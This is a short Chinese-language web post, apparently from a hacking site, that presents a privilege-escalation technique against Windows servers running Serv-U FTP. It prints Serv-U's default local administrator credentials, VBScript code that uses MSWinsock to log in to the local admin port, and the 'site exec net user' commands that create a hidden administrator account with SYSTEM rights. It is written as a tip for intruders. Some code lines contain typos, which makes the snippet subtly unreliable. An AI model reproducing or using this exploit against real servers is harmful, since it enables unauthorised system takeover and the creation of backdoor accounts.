我要评论
适用环境:服务器禁用fso,关掉wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了serv-u的管理员的密码。serv-u默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用mswinsock。winsock建立一个连接,并且以system权限添加超级用户,代码如下:
以下是引用片段:
dim revdata
dim sendata
set sock=createobject(“mswinsock.winsock”)
sock.protocol=0
sock.connect “127.0.0.1”,43958
sendata=”localadministrator”& chr(10) &chr(13)
sock.senddata snedata
sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)
sock.senddata.sendata
使用这个代码就可以连上ftp了,接下来用sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add”
呵呵,就这样系统权限到手了,祝大家好运!
- 站内搜索
发表评论